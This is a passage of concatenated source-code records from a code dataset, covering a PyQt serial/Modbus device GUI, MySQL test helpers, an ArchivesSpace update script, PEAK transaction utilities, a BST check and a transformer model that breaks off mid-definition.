switches\n            self.switch_1 = switch(config['digital_device']['addr'],config['digital_device']['input']['td01'], self.master)\n        except Exception as e:\n            self.serial_message.append(\"Read config at {} failed\".format(yamlPath))\n            print(str(e))\n\n    \"\"\"\n    onclick:serial_connect\n    input:\n        self.serial_port.currentText()\n        self.baud_rate.currentText()\n        self.data_bit.currentText()\n        self.parity.currentText()\n        self.stop_bit.currentText()\n    output:\n        self.ser\n        self.master\n        self.serial_message\n        self.serial_flag\n    \"\"\"\n    def serial_connect(self):\n        if not self.serial_flag:\n            serial_port = self.serial_port.currentText()\n            modbus_port = self.modbus_port.currentText()\n            baud_rate = self.baud_rate.currentText()\n            data_bit = int(self.data_bit.currentText())\n            parity = self.parity.currentText()\n            stop_bit = int(self.stop_bit.currentText())\n            try:\n                # serial port for the entrance reader\n                self.ser=serial.Serial(port=serial_port,baudrate=baud_rate,bytesize=data_bit,parity=parity,stopbits=stop_bit)\n                # serial port for the RS-485 devices\n                self.mod=serial.Serial(port=modbus_port,baudrate=baud_rate,bytesize=data_bit,parity=parity,stopbits=stop_bit)\n                # modbus master object\n                self.master = modbus_rtu.RtuMaster(self.mod)\n                self.master.set_timeout(0.5)\n                self.master.set_verbose(True)\n                self.logger.info(\"connected\")\n                if self.ser.isOpen():\n                    self._serial_state(\"connected\")\n                    self.serial_message.append(\"[State] Serial connected\")\n                    self.serial_flag = True\n                    self.init_hardware()\n                    # Start entrance thread\n                    self.entranceThread = entranceThread()\n                    self.entranceThread.setser(self.ser)\n                    self.entranceThread.updated.connect(self._thread_append)\n                    self.entranceThread.start_work.connect(self._workthread)\n            except Exception as e:\n                self.serial_message.append(\"Open {0} failed, make sure you open the device\".format(serial_port))\n                self._serial_state(\"failed\")\n        else:\n            self.serial_message.append(\"[State] Serial already connected\")\n\n    def serial_disconnect(self):\n        try:\n            self.ser.flush()\n            if self.ser.isOpen():\n                self.entranceThread.threadStop()\n                self.entranceThread.quit()\n                self.entranceThread = None\n\n                self.master.close()\n                self.ser.close()\n                self._serial_state(\"wait\")\n                self.serial_message.append(\"[State] Serial disconnected\")\n            else:\n                self._serial_state(\"failed\")\n                self.serial_message.append(\"[State] Serial could not connect\")\n            self.serial_flag = self.ser.isOpen()\n        except Exception as e:\n            self.serial_message.append(\"[State] Close serial connect failed\")\n            self._serial_state(\"wait\")\n\n    def _serial_state(self,state):\n        if state == 'failed':\n            self.waitinglabel.setStyleSheet(\"color:red;font-weight:bold\")\n            self.waitinglabel.setText(\"Failed\")\n        if state == 'wait':\n            self.waitinglabel.setStyleSheet(\"color:black;font-weight:bold\")\n            self.waitinglabel.setText(\"Not Connected\")\n        if state == 'connected':\n            self.waitinglabel.setStyleSheet(\"color:green;font-weight:bold\")\n            self.waitinglabel.setText(\"Connected\")\n        else:\n            pass\n\n    def clean_log(self):\n        self.serial_message.clear()\n        pass\n\n    def _create_leds(self):\n        for i in range (0,16):\n            exec('self.led_widget.led_input{0} = Led(self.led_widget, on_color=Led.red, shape=Led.circle, build=\"debug\")'.format(i))\n        for i in range (0,16):\n            exec('self.led_widget.led_output{0} = Led(self.led_widget, on_color=Led.red, shape=Led.circle, build=\"debug\")'.format(i))\n    \n    def _arrange_leds(self):\n        for i in range (0,16):\n            exec('self.led_widget._layout.addWidget(self.led_widget.led_input{0},0,{0}, 1, 1, QtCore.Qt.AlignCenter)'.format(i))\n        for i in range (0,16):\n            
exec('self.led_widget._layout.addWidget(self.led_widget.led_output{0},1,{0}, 1, 1, QtCore.Qt.AlignCenter)'.format(i))\n\n def _thread_append(self, text):\n self.serial_message.append(text)\n\n def _workthread(self, flag):\n if flag == True:\n self.workThread = workThread()\n self.workThread.setdevice(self.motor_1,self.switch_1)\n self.workThread.updated.connect(self._thread_append)\n pass\n\nif __name__ == \"__main__\":\n QtWidgets.QApplication.setAttribute(Qt.AA_EnableHighDpiScaling)\n app=QtWidgets.QApplication(sys.argv)\n myshow=MyWindow()\n myshow.show()\n sys.exit(app.exec())","sub_path":"thread-demo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"477734669","text":"import mysql.connector\nfrom mysql.connector import Error\nfrom time import sleep\n\ncnx = mysql.connector.connect(host='localhost', database='sqa', user='root', password='database!')\n\n\ndef getLastUser():\n cursor = cnx.cursor()\n\n query = \"SELECT u.full_name, u.date_of_birth, u.address, u.email, c.name, m.name_major \\\n FROM user AS u, major AS m, course AS c \\\n WHERE u.course_id = c.id \\\n AND u.major_id = m.id \\\n ORDER BY u.id DESC LIMIT 1;\"\n\n cursor.execute(query)\n user = cursor.fetchone()\n user = list(user)\n user[1] = user[1].strftime('%m/%d/%Y')\n return tuple(user)\n\n\ndef getIdLastUser():\n cursor = cnx.cursor()\n\n query = \"SELECT user.id \\\n FROM user \\\n ORDER BY user.id DESC LIMIT 1;\"\n\n cursor.execute(query)\n user = cursor.fetchone()\n return user[0]\n\n\ndef getUserById(idUser):\n cursor = cnx.cursor()\n query = \"SELECT u.full_name, u.date_of_birth, u.address, u.email, c.name, m.name_major \\\n FROM user AS u, major AS m, course AS c \\\n WHERE u.course_id = c.id \\\n AND u.major_id = m.id \\\n AND u.id = %s;\"\n condition = (idUser,)\n cursor.execute(query, condition)\n user = cursor.fetchone()\n if user:\n user = list(user)\n user[1] = user[1].strftime('%m/%d/%Y')\n else:\n user = []\n return tuple(user)\n\n\ndef getUserByIdForDel(idUser):\n cursor = cnx.cursor()\n query = \"SELECT user.code, user.status \\\n FROM user \\\n WHERE user.id = %s\"\n condition = (idUser,)\n cursor.execute(query, condition)\n data = cursor.fetchone()\n user = {\n 'code': data[0],\n 'status': data[1]\n }\n return user\n\n\ndef deleteLastUser():\n cursor = cnx.cursor()\n query = \"DELETE FROM user ORDER BY id DESC LIMIT 1\"\n cursor.execute(query)\n cnx.commit()\n return True\n","sub_path":"src/test/java/com/vaigay/WebSpringBoot/selenium/sqlUtils.py","file_name":"sqlUtils.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"98646024","text":"class Solution:\n # @return an integer\n def romanToInt(self, s):\n if len(s) == 0:\n return 0\n num_map = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000}\n prev = num_map[s[0]]\n res = prev\n for i in range(1, len(s)):\n cur = num_map[s[i]]\n if cur > prev:\n res += cur - 2 * prev\n else:\n res += cur\n prev = cur\n return res\n \n","sub_path":"src/main/python/lc/roman_to_int.py","file_name":"roman_to_int.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"211153805","text":"\"\"\"Support for atomic but \"in a parallel transaction\" operations\"\"\"\n\nfrom peak.api import *\nfrom peak.util.advice import advice\n\n__all__ = [\n 
'AutoCommitter', 'Untransactable', 'autocommitted'\n]\n\n\nclass AutoCommitter(storage.TransactionComponent):\n\n    \"\"\"TransactionComponent that supports 'autocommit' setting and methods\n\n    'AutoCommitter' instances accept an 'autocommit' keyword argument\n    which tells them they have permission to take control of their\n    transaction boundaries. Any 'autocommitted' methods of an\n    'AutoCommitter' will automatically be wrapped in a transaction if\n    the object has not already joined one.\n\n    In addition, if a 'txnSvc' keyword isn't supplied, but 'autocommit'\n    is a true value, 'AutoCommitter' objects allocate their own private\n    transaction service instance, for use in 'autocommitted' methods.\n    This transaction service will be shared with any sub-components of\n    the 'AutoCommitter', thus ensuring composability. You will normally\n    want your subcomponents, however, to be created with a false or missing\n    'autocommit' setting, so that they simply participate in your\n    component's private transaction if appropriate.\n    \"\"\"\n\n    autocommit = False\n\n    def __init__(self,*__args,**__kw):\n\n        super(AutoCommitter,self).__init__(*__args,**__kw)\n\n        if self.autocommit and not self._hasBinding('txnSvc'):\n            self.txnSvc = storage.TransactionService(self,'txnSvc')\n\n\n\nclass Untransactable(binding.Component):\n\n    \"\"\"Untransactable object that *requires* a true setting for 'autocommit'\n\n    Subclass this if you have an object which is not transactional, but\n    might be used interchangeably with similar 'AutoCommitter' objects.\n    This ensures that an attempt to create an instance of your class\n    will raise an exception if a true setting for 'autocommit' isn't\n    supplied, thus warning the caller in the event that they mistakenly\n    used the wrong implementation for their desired semantics. For\n    example, if they used an SMTP messaging class instead of a queue-based\n    messaging class, but wanted the message send to wait until transaction\n    commit time.\n    \"\"\"\n\n    def __init__(self,*__args,**__kw):\n\n        super(Untransactable,self).__init__(*__args,**__kw)\n\n        if not self.autocommit:\n            raise exceptions.TransactionsNotSupported(\n                \"%r does not support transactions; the 'autocommit'\"\n                \" flag is required.\" % self\n            )\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nclass autocommitted(advice):\n\n    \"\"\"meth = autocommitted(meth) - Wrap a method with autocommit support\n\n    'AutoCommitter' classes should wrap any methods which want to be\n    atomic operations in an 'autocommitted()' advice. For example::\n\n        from peak.storage.autocommit import *\n\n        class QueuedMessageSender(AutoCommitter):\n\n            def send(self,message):\n                # ...\n\n            send = autocommitted(send)\n\n    When a 'QueuedMessageSender' object's 'send()' method is called,\n    it will be wrapped in a transaction as long as the object was\n    created with a true setting for its 'autocommit' parameter. If\n    an error is raised from 'send()', the transaction will be aborted,\n    otherwise it will be committed.\n\n    If a wrapped method is called from inside another 'autocommitted()'\n    method of the same object, or if the object doesn't have 'autocommit'\n    set to a true value, no special transaction handling occurs.\n\n    Note that errors raised during the wrapping transaction's commit or\n    abort method may leave the object's transaction service stuck in a\n    failure mode, where it cannot be committed, only aborted. This can\n    be fixed by calling the 'theBrokenObject.txnSvc.abort()' until it\n    no longer raises an exception. 
Or, it may be more worthwhile to\n set up a custom error handler on the transaction service instance\n used for autocommit transactions. Once we have enough experience\n with this issue to know what's most useful, we may add such an\n error handler to the 'AutoCommitter' default 'txnSvc' setup code.\n\n Also note that wrapped methods should always use 'self.joinedTxn' to\n ensure they have joined a transaction; this wrapper doesn't do it for\n you. (It can't, since it would then fail to work correctly when\n autocommit is turned off.)\"\"\"\n\n __slots__ = ()\n\n\n def __call__(__advice, self, *__args, **__kw):\n\n if self.autocommit and not self.txnSvc.isActive():\n\n # We only want to do this if a transaction isn't already in\n # progress, *and* the object is in autocommit mode.\n\n self.txnSvc.begin()\n\n try:\n retval = __advice._func(self, *__args, **__kw)\n except:\n self.txnSvc.abort()\n raise\n else:\n self.txnSvc.commit()\n return retval\n\n else:\n # Just call the method\n return __advice._func(self, *__args, **__kw)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"PEAK-0.5a4dev_r2085/src/peak/storage/autocommit.py","file_name":"autocommit.py","file_ext":"py","file_size_in_byte":5125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"613226100","text":"#/usr/bin/python3\n#~/anaconda3/bin/python\n\nimport requests, csv, json, time, traceback, logging\n\n#generic thumbnail\n#\"https://libweb.library.yale.edu/pui-assets/access_thumb.jpg\"\n\n#Log in to the ArchivesSpace API\ndef login():\n api_url = input('Please enter the ArchivesSpace API URL: ')\n username = input('Please enter your username: ')\n password = input('Please enter your password: ')\n auth = requests.post(api_url+'/users/'+username+'/login?password='+password).json()\n #if session object is returned then login was successful; if not it failed.\n if 'session' in auth:\n session = auth[\"session\"]\n headers = {'X-ArchivesSpace-Session':session}\n print('Login successful!')\n return (api_url, headers)\n else:\n print('Login failed! 
Check credentials and try again')\n return\n\n#Open a CSV in reader mode\ndef opencsv():\n input_csv = input('Please enter path to CSV: ')\n file = open(input_csv, 'r', encoding='utf-8')\n csvin = csv.reader(file)\n next(csvin, None)\n return csvin\n\n#Open a text file in writer mode\ndef opentxt():\n filepath = input('Please enter path to output text file: ')\n filename = open(filepath, 'a', encoding='utf-8')\n return filename\n\ndef openjson(directory, filename):\n filepath = open(directory + '/' + filename + '.json', 'w', encoding='utf-8')\n return filepath\n\n#Keeps script runtime\ndef keeptime(start, outfile):\n elapsedtime = time.time() - start\n m, s = divmod(elapsedtime, 60)\n h, m = divmod(m, 60)\n outfile.write('Total time elapsed: ')\n outfile.write('%d:%02d:%02d' % (h, m, s) + '\\n')\n\n\n#add some kind of status update thing so i know it's still going...\ndef create_file_uris():\n starttime = time.time()\n #execute login function, return api url and headers\n values = login()\n #opens the csv containing data to be added to AS\n csvfile = opencsv()\n #opens log file - CHANGE TO LOGGING!!!\n txtfile = opentxt()\n dirpath = input('Please enter path to backup directory: ')\n #First attempt to use enumerate to calculate success did not work, so using this for now\n x = 0\n #using enumerate to calculate total attempts\n for i, row in enumerate(csvfile, 1):\n #retrieve this data from Ladybird or AS database\n record_uri = row[0]\n #for the open with permission this is still in the digital object ID. For the others have it on\n #a csv\n find_it_url = row[1]\n #use the generic thumbnail for the open with permissions, and thumbs from Ladybird for others; some failed. Will\n #need a webscrape report of diffs\n thumbnail_url = row[2]\n #this will eventually be the OID...for now it is the dig coll ID...\n dig_object_id = row[3]\n try:\n #can add more data here depending on needs\n #retrieves digital object JSON for each digital object URI in the input CSV\n record_json = requests.get(values[0] + record_uri, headers=values[1]).json()\n outfile = openjson(dirpath, record_uri[1:].replace('/','_'))\n json.dump(record_json, outfile)\n record_json['publish'] = True\n record_json['digital_object_id'] = dig_object_id\n find_it_file_version = {'file_uri': find_it_url, 'jsonmodel_type': 'file_version', \n 'xlink_show_attribute': 'new', 'publish': True}\n thumbnail_file_version = {'file_uri': thumbnail_url, 'jsonmodel_type': 'file_version', \n 'xlink_show_attribute': 'embed', 'publish': True}\n #record_json['file_versions'].append(thumbnail_file_version)\n record_json['file_versions'].extend([find_it_file_version, thumbnail_file_version])\n record_data = json.dumps(record_json)\n record_update = requests.post(values[0]+ record_uri, headers=values[1], data=record_data).json()\n #print(record_update)\n if 'status' in record_update:\n x += 1\n y = list(range(0, 50000, 100))\n if x in y:\n print(str(x))\n elif 'error' in record_update:\n txtfile.write('error: could not update ' + str(record_uri) + '\\n')\n txtfile.write('log: ' + str(record_update.get('error')) + '\\n')\n print(record_update)\n except Exception as exc:\n print(record_uri)\n print(traceback.format_exc())\n txtfile.write(record_uri + '\\n')\n txtfile.write(str(traceback.format_exc()) + '\\n')\n txtfile.write(str(exc) + '\\n')\n continue\n txtfile.write('Total number of records attempted: ' + str(i) + '\\n')\n txtfile.write('Successful updates: ' + str(x) + '\\n')\n keeptime(starttime, txtfile)\n print('All 
Done!')\n\n\n","sub_path":"file_versions/create_file_versions.py","file_name":"create_file_versions.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"219447283","text":"\"\"\"\nDocta projects handler.\n\"\"\"\nfrom __future__ import absolute_import, print_function, unicode_literals\nfrom future.builtins import super\nimport os\nimport hashlib\nimport docta.chapters\nimport docta.exceptions\nimport docta.render\nimport docta.utils.fs as fs\nimport docta.utils.meta as meta\n\n# Defaults\nOUT_FORMAT_DEFAULT = 'html'\n\n\nclass Project(object):\n \"\"\"\n Project data handler: scans project directories, manages resources,\n creates empty project, builds project.\n \"\"\"\n def __init__(self, path, config=None):\n self.path = path\n self.config = config or {}\n\n def load(self):\n \"\"\"\n Load project structure.\n \"\"\"\n self.tree = []\n\n for chapter_config in self.config.get('chapters', []):\n config = self.config.copy()\n config.update(chapter_config)\n # print(\"Chapter config: %s\" % config)\n\n nav_path = config.get('base_nav_path', '')\n chapter = docta.chapters.load_tree(self.input_dir(config),\n config, nav_path=nav_path)\n self.tree.append(chapter)\n # self.print_tree(self.tree[-1])\n\n def build(self, formats=None):\n \"\"\"\n Build project with specified formats.\n \"\"\"\n self.load()\n\n for out_format in (formats or [OUT_FORMAT_DEFAULT]):\n render_class = docta.render.get_renderer(out_format)\n renderer = render_class(self)\n renderer.render()\n\n def input_dir(self, config=None):\n \"\"\"\n Full input dir path for specified config.\n \"\"\"\n if config is None:\n config = self.config\n return fs.real(fs.join(self.path, config.get('input_path', '.')))\n\n def output_dir(self, out_format=None):\n \"\"\"\n Output directory for specified format.\n \"\"\"\n output = self.config['output'][out_format]\n if isinstance(output, dict):\n output_rel_path = output.get('build_path', out_format)\n else:\n output_rel_path = output\n return fs.path_for_dir(self.path, output_rel_path)\n\n def assets_dir(self, out_format=None):\n \"\"\"\n Output directory for assets and specified format.\n \"\"\"\n output = self.config['output'][out_format]\n if isinstance(output, dict):\n output_rel_path = output.get('assets_path')\n if output_rel_path:\n return fs.path_for_dir(self.path, output_rel_path)\n\n def templates_dir(self):\n \"\"\"\n Jinja templates directory.\n \"\"\"\n return fs.path_for_dir(self.path, self.config.get('templates', '_templates'))\n\n def copy_resources(self, out_format=None):\n \"\"\"\n Copy resources to output directory.\n \"\"\"\n if self.config.get('resources'):\n in_resources = fs.path_for_dir(self.path, self.config['resources'])\n out_resources = self.output_dir(out_format)\n fs.cp(in_resources, out_resources, overwrite=True)\n\n def copy_assets(self, out_format=None):\n \"\"\"\n Copy assets to output directory.\n \"\"\"\n if self.config.get('assets'):\n in_assets = fs.path_for_dir(self.path, self.config['assets'])\n out_assets = self.assets_dir(out_format)\n if out_assets:\n fs.cp(in_assets, out_assets, overwrite=True)\n\n def asset_hash(self, rel_path):\n \"\"\"\n Get asset file checksum.\n \"\"\"\n if self.config.get('assets'):\n assets_dir = fs.path_for_dir(self.path, self.config['assets'])\n path = os.path.join(assets_dir, rel_path)\n return hashlib.md5(open(path, 'rb').read()).hexdigest()\n\n def print_tree(self, root):\n \"\"\"\n DEBUG: print chapters tree\n \"\"\"\n def 
print_chapter(chapter, level=0):\n            print(' '*level, str(chapter))\n            for ch in chapter.children:\n                print_chapter(ch, level+1)\n        print_chapter(root)\n\n","sub_path":"docta/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":4006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"226333996","text":"# Returns whether binary tree is binary search tree, in O(n) time and extra space\n\nclass BinTreeNode:\n    def __init__(self, val, left=None, right=None):\n        self.left, self.right, self.val = left, right, val\n\n    def in_order(self):\n        if self.left: yield from self.left.in_order()\n\n        yield self\n\n        if self.right: yield from self.right.in_order()\n\ndef is_bst(bin_tree_node):\n    prev_val, val = None, None\n    for node in bin_tree_node.in_order():\n        val = node.val\n        if prev_val is not None and val < prev_val: return False\n        prev_val = val\n\n    return True\n\nroot = BinTreeNode(8)\nroot.left, root.right = BinTreeNode(4), BinTreeNode(12)\nroot.left.left, root.left.right = BinTreeNode(2), BinTreeNode(6)\nroot.left.right.left = BinTreeNode(4)\nroot.left.right.left.right = BinTreeNode(5)\nroot.right.left, root.right.right = BinTreeNode(9), BinTreeNode(15)\nroot.right.left.right = BinTreeNode(10)\nroot.right.left.right.right = BinTreeNode(11)\n\nprint(is_bst(root) == True)\n\nroot.right.left.right.right.left = BinTreeNode(13)\n\nprint(is_bst(root) == False)\n","sub_path":"py/is_bst.py","file_name":"is_bst.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"7750985","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math, copy, time\nfrom torch.autograd import Variable\n\nfrom utils import outputActivation\n\nimport pdb\n\n\n# Customizations\n# - DONE Embeddings: linear transform d_feats -> d_model features\n# - DONE Generator\n# - DONE Batching\n\n# DONE: add social context\n# DONE : use maneuvers\n#\t\t\t- GeneratorLat and GeneratorLon DONE\n#\t\t\t- Embeddings with traj/grid/lat/lon features DONE\n\n\n# ---------- EMBEDDINGS ----------\n\nclass Embeddings(nn.Module):\n\tdef __init__(self, d_model, src_feats, src_ngrid=0, src_grid=(13,3), src_lon=0, src_lat=0, soc_emb_size=0):\n\t\tsuper(Embeddings, self).__init__()\n\t\t#self.lut = nn.Embedding(vocab, d_model)\n\t\tself.d_model = copy.copy(d_model)\n\n\t\tself.traj_emb = None\n\t\tself.grid_emb = None\n\t\tself.lat_emb = None\n\t\tself.lon_emb = None\n\t\tself.soc_emb = None\n\n\t\tself.soc_emb_size = soc_emb_size\n\n\t\t# Basically, out of the 512 features for d_model encoding we split as:\n\t\t#\t256 features for ego traj inputs\n\t\t#\t256 features for social context (occupancy grid) inputs\n\t\t# Additionally we may reserve 20 features (3*4+2*4) for maneuvers used as inputs\n\n\t\t# Or just 512 features for traj_emb (eg at the output)\n\n\t\tif src_ngrid > 0: # handle 2D input features with conv net\n\t\t\td_model_grid = d_model//2\n\t\t\td_model -= d_model_grid\n\t\t\t# We start with [Batch, src_ngrid, 13, 3]\n\t\t\tself.conv1 = torch.nn.Conv2d(src_ngrid, 64, 3) # => [64, 11, 1]\n\t\t\tself.conv2 = torch.nn.Conv2d(64, 16, (3,1)) # => [16,\t9, 1]\n\t\t\tself.maxpool = torch.nn.MaxPool2d((2,1),padding = (1,0)) # => [16, 5, 1]\n\t\t\tself.leaky_relu = torch.nn.LeakyReLU(0.1)\n\t\t\tself.grid_emb = torch.nn.Linear(5, d_model_grid) # 5 from [16, 5, 1]\n\n\t\t\tif soc_emb_size > 0:\n\t\t\t\tself.soc_emb = torch.nn.Linear(soc_emb_size, 
d_model_grid) # projection\n\n\t\tif src_lon > 0:\n\t\t\td_model_lon = src_lon * 4\n\t\t\td_model -= d_model_lon\n\t\t\tself.lon_emb = torch.nn.Linear(src_lon, d_model_lon)\n\n\t\tif src_lat > 0:\n\t\t\td_model_lat = src_lat * 4\n\t\t\td_model -= d_model_lat\n\t\t\tself.lat_emb = torch.nn.Linear(src_lat, d_model_lat)\n\n\t\tself.traj_emb = torch.nn.Linear(src_feats, d_model)\n\n\tdef forward(self, x):\n\t\t# workaround to make nn.Sequential work with multiple inputs\n\t\t# cf https://discuss.pytorch.org/t/nn-sequential-layers-forward-with-multiple-inputs-error/35591/3\n\t\t#x, soc = x[0], x[1]\n\t\ttraj, grid, lon, lat = x\n\t\temb = self.traj_emb(traj) # * math.sqrt(self.d_model)\n\n\t\tif grid is not None:\n\t\t\tif len(grid.shape) == 3: # 1D input\n\t\t\t\tassert self.soc_emb is not None\n\t\t\t\tsoc_emb = self.soc_emb(grid) # * math.sqrt(self.d_model)\n\t\t\t\temb = torch.cat((emb, soc_emb), dim=-1)\n\t\t\telse: # 2D input\n\t\t\t\tassert self.grid_emb is not None\n\t\t\t\t## Apply convolutional social pooling: => [128, 16, 5, 1]\n\t\t\t\tgrid_enc = self.maxpool(self.leaky_relu(self.conv2(self.leaky_relu(self.conv1(grid)))))\n\t\t\t\tgrid_enc = torch.squeeze(grid_enc) # [128, 16, 5]\n\t\t\t\tgrid_emb = self.grid_emb(grid_enc)\n\t\t\t\temb = torch.cat((emb, grid_emb), dim=-1)\n\n\t\tif lon is not None:\n\t\t\tassert self.lon_emb is not None\n\t\t\tlon_emb = self.lon_emb(lon) # * math.sqrt(self.d_model)\n\t\t\temb = torch.cat((emb, lon_emb), dim=-1)\n\n\t\tif lat is not None:\n\t\t\tassert self.lat_emb is not None\n\t\t\tlat_emb = self.lat_emb(lat) # * math.sqrt(self.d_model)\n\t\t\temb = torch.cat((emb, lat_emb), dim=-1)\n\n\t\t#print(\"EMB:\", emb.shape)\n\t\treturn emb # * math.sqrt(self.d_model)\n\t\t#return self.lut(x) * math.sqrt(self.d_model)\n\n\nclass PositionalEncoding(nn.Module):\n\t\"Implement the PE function.\"\n\tdef __init__(self, d_model, dropout, max_len=5000):\n\t\tsuper(PositionalEncoding, self).__init__()\n\t\tself.dropout = nn.Dropout(p=dropout)\n\t\t\n\t\t# Compute the positional encodings once in log space.\n\t\tpe = torch.zeros(max_len, d_model)\n\t\tposition = torch.arange(0., max_len).unsqueeze(1)\n\t\tdiv_term = torch.exp(torch.arange(0., d_model, 2) *\n\t\t\t\t\t\t\t -(math.log(10000.0) / d_model))\n\t\tpe[:, 0::2] = torch.sin(position * div_term)\n\t\tpe[:, 1::2] = torch.cos(position * div_term)\n\t\tpe = pe.unsqueeze(0)\n\t\tself.register_buffer('pe', pe)\n\t\t\n\tdef forward(self, x):\n\t\tx = x + Variable(self.pe[:, :x.size(1)], \n\t\t\t\t\t\t requires_grad=False)\n\t\treturn self.dropout(x)\n\n\n# ---------- COMMON LAYERS for encoder/decoder ----------\n\ndef attention(query, key, value, mask=None, dropout=None):\n\t\"Compute 'Scaled Dot Product Attention'\"\n\td_k = query.size(-1)\n\tscores = torch.matmul(query, key.transpose(-2, -1)) \\\n\t\t\t / math.sqrt(d_k)\n\tif mask is not None:\n\t\tscores = scores.masked_fill(mask == 0, -1e9)\n\tp_attn = F.softmax(scores, dim = -1)\n\tif dropout is not None:\n\t\tp_attn = dropout(p_attn)\n\treturn torch.matmul(p_attn, value), p_attn\n\n\nclass MultiHeadedAttention(nn.Module):\n\tdef __init__(self, h, d_model, dropout=0.1):\n\t\t\"Take in model size and number of heads.\"\n\t\tsuper(MultiHeadedAttention, self).__init__()\n\t\tassert d_model % h == 0\n\t\t# We assume d_v always equals d_k\n\t\tself.d_k = d_model // h\n\t\tself.h = h\n\t\tself.linears = clones(nn.Linear(d_model, d_model), 4)\n\t\tself.attn = None\n\t\tself.dropout = nn.Dropout(p=dropout)\n\t\t\n\tdef forward(self, query, key, value, 
mask=None):\n\t\t\"Implements Figure 2\"\n\t\tif mask is not None:\n\t\t\t# Same mask applied to all h heads.\n\t\t\tmask = mask.unsqueeze(1)\n\t\tnbatches = query.size(0)\n\t\t\n\t\t# 1) Do all the linear projections in batch from d_model => h x d_k \n\t\tquery, key, value = \\\n\t\t\t[l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2)\n\t\t\t for l, x in zip(self.linears, (query, key, value))]\n\t\t\n\t\t# 2) Apply attention on all the projected vectors in batch. \n\t\tx, self.attn = attention(query, key, value, mask=mask, \n\t\t\t\t\t\t\t\t dropout=self.dropout)\n\t\t\n\t\t# 3) \"Concat\" using a view and apply a final linear. \n\t\tx = x.transpose(1, 2).contiguous() \\\n\t\t\t .view(nbatches, -1, self.h * self.d_k)\n\t\treturn self.linears[-1](x)\n\n\nclass LayerNorm(nn.Module):\n\t\"Construct a layernorm module (See citation for details).\"\n\tdef __init__(self, features, eps=1e-6):\n\t\tsuper(LayerNorm, self).__init__()\n\t\tself.a_2 = nn.Parameter(torch.ones(features))\n\t\tself.b_2 = nn.Parameter(torch.zeros(features))\n\t\tself.eps = eps\n\n\tdef forward(self, x):\n\t\tmean = x.mean(-1, keepdim=True)\n\t\tstd = x.std(-1, keepdim=True)\n\t\treturn self.a_2 * (x - mean) / (std + self.eps) + self.b_2\n\n\nclass SublayerConnection(nn.Module):\n\t\"\"\"\n\tA residual connection followed by a layer norm.\n\tNote for code simplicity the norm is first as opposed to last.\n\t\"\"\"\n\tdef __init__(self, size, dropout):\n\t\tsuper(SublayerConnection, self).__init__()\n\t\tself.norm = LayerNorm(size)\n\t\tself.dropout = nn.Dropout(dropout)\n\n\tdef forward(self, x, sublayer):\n\t\t\"Apply residual connection to any sublayer with the same size.\"\n\t\t# XXX return x + self.dropout(sublayer(self.norm(x)))\n\t\t# XXX Normalize after residual cnx like in the paper\n\t\treturn self.norm(x + self.dropout(sublayer(x)))\n\n\nclass PositionwiseFeedForward(nn.Module):\n\t\"Implements FFN equation.\"\n\tdef __init__(self, d_model, d_ff, dropout=0.1):\n\t\tsuper(PositionwiseFeedForward, self).__init__()\n\t\tself.w_1 = nn.Linear(d_model, d_ff)\n\t\tself.w_2 = nn.Linear(d_ff, d_model)\n\t\tself.dropout = nn.Dropout(dropout)\n\n\tdef forward(self, x):\n\t\treturn self.w_2(self.dropout(F.relu(self.w_1(x))))\n\n\ndef clones(module, N):\n\t\"Produce N identical layers.\"\n\treturn nn.ModuleList([copy.deepcopy(module) for _ in range(N)])\n\n\n# ---------- ENCODER ----------\n\nclass EncoderLayer(nn.Module):\n\t\"Encoder is made up of self-attn and feed forward (defined below)\"\n\tdef __init__(self, size, self_attn, feed_forward, dropout):\n\t\tsuper(EncoderLayer, self).__init__()\n\t\tself.self_attn = self_attn\n\t\tself.feed_forward = feed_forward\n\t\tself.sublayer = clones(SublayerConnection(size, dropout), 2)\n\t\tself.size = size\n\n\tdef forward(self, x, mask):\n\t\t\"Follow Figure 1 (left) for connections.\"\n\t\tx = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, mask))\n\t\treturn self.sublayer[1](x, self.feed_forward)\n\n\nclass Encoder(nn.Module):\n\t\"Core encoder is a stack of N layers\"\n\tdef __init__(self, layer, N):\n\t\tsuper(Encoder, self).__init__()\n\t\tself.layers = clones(layer, N)\n\t\tself.norm = LayerNorm(layer.size)\n\t\t\n\tdef forward(self, x, mask):\n\t\t\"Pass the input (and mask) through each layer in turn.\"\n\t\tfor layer in self.layers:\n\t\t\tx = layer(x, mask)\n\t\treturn self.norm(x)\n\n\n# ---------- DECODER ----------\n\nclass DecoderLayer(nn.Module):\n\t\"Decoder is made of self-attn, src-attn, and feed forward (defined below)\"\n\tdef __init__(self, 
